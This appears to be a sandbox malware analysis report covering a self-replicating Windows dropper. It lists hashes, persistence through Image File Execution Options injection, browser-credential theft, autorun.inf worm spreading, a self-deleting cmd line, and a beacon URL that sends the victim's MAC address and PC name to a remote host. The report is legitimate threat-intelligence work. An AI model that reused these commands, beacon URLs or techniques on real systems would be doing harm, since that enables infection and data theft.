Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

0c53020e8f...18.exe

windows7-x64

8

0c53020e8f...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02/10/2024, 20:20 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe

  • Size

    161KB

  • MD5

    0c53020e8fb7b089a7fcb9d1534e7d60

  • SHA1

    49304cb6355babbfd878ab5a0b01f34deb8030b1

  • SHA256

    c6f22aa00fa730828c90e7032889291c5b624facd56561e6684c855927ae4939

  • SHA512

    981978b569bb92540b6bfbe972b281b8c118612d4b1590763be5ca6eb19a8971fc4518d0c3cf0507986b595903c5791ca29bbfd3b562849a0379a1af7a5920eb

  • SSDEEP

    1536:dVyn1qvUo29OpBlXb94kWV7PYKmy8MMoWQdSCXa:2n1QTOkWZwy/7q

Score
8/10
defense_evasiondiscoverypersistencespywarestealer

Malware Config

Signatures

  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe
      C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe _sys
      2⤵
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1576
      • C:\Windows\system\BoBoTurbo.exe
        C:\Windows\system\BoBoTurbo.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\system\BoBoTurbo.exe
          C:\Windows\system\BoBoTurbo.exe _sys
          4⤵
          • Event Triggered Execution: Image File Execution Options Injection
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1760
          • C:\Windows\system\BoBoTurbo.exe
            C:\Windows\system\BoBoTurbo.exe down
            5⤵
            • Executes dropped EXE
            PID:2116
          • C:\Windows\system\BoBoTurbo.exe
            C:\Windows\system\BoBoTurbo.exe worm
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Drops autorun.inf file
            • Drops file in Program Files directory
            PID:2688
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c erase /A:RHSA "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"&cmd /c del "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2200
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c del "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"
          4⤵
          • Deletes itself
          • System Location Discovery: System Language Discovery
          PID:2764

Network

  • flag-us
    DNS
    g.6u6.biz
    BoBoTurbo.exe
    Remote address:
    8.8.8.8:53
    Request
    g.6u6.biz
    IN A
    Response
  • flag-us
    DNS
    union.21575.com
    BoBoTurbo.exe
    Remote address:
    8.8.8.8:53
    Request
    union.21575.com
    IN A
    Response
    union.21575.com
    IN A
    107.167.27.81
  • flag-us
    GET
    http://union.21575.com/count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0
    BoBoTurbo.exe
    Remote address:
    107.167.27.81:80
    Request
    GET /count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
    Host: union.21575.com
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Date: Wed, 02 Oct 2024 20:22:04 GMT
    Content-Length: 1502
  • 107.167.27.81:80
    http://union.21575.com/count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0
    http
    BoBoTurbo.exe
    647 B
     2.0kB
     9
    9

    HTTP Request

    GET http://union.21575.com/count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0

    HTTP Response

    200
  • 8.8.8.8:53
    g.6u6.biz
    dns
    BoBoTurbo.exe
    55 B
     117 B
     1
    1

    DNS Request

    g.6u6.biz

  • 8.8.8.8:53
    union.21575.com
    dns
    BoBoTurbo.exe
    61 B
     77 B
     1
    1

    DNS Request

    union.21575.com

    DNS Response

    107.167.27.81

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

1
T1091

Execution

Persistence

Event Triggered Execution

1
T1546

Image File Execution Options Injection

1
T1546.012

Privilege Escalation

Event Triggered Execution

1
T1546

Image File Execution Options Injection

1
T1546.012

Defense Evasion

Indicator Removal

1
T1070

File Deletion

1
T1070.004

Credential Access

Credentials from Password Stores

1
T1555

Credentials from Web Browsers

1
T1555.003

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Discovery

Peripheral Device Discovery

1
T1120

Query Registry

1
T1012

System Information Discovery

1
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Replication Through Removable Media

1
T1091

Collection

Data from Local System

1
T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Windows\system\BoBoTurbo.exe
    Filesize

    161KB

    MD5

    0c53020e8fb7b089a7fcb9d1534e7d60

    SHA1

    49304cb6355babbfd878ab5a0b01f34deb8030b1

    SHA256

    c6f22aa00fa730828c90e7032889291c5b624facd56561e6684c855927ae4939

    SHA512

    981978b569bb92540b6bfbe972b281b8c118612d4b1590763be5ca6eb19a8971fc4518d0c3cf0507986b595903c5791ca29bbfd3b562849a0379a1af7a5920eb

    Download Submit

  • memory/1576-5-0x0000000000300000-0x0000000000326000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1576-19-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1760-39-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1916-0-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1916-1-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2116-32-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2628-14-0x0000000000220000-0x0000000000246000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2628-28-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2688-41-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2688-77-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.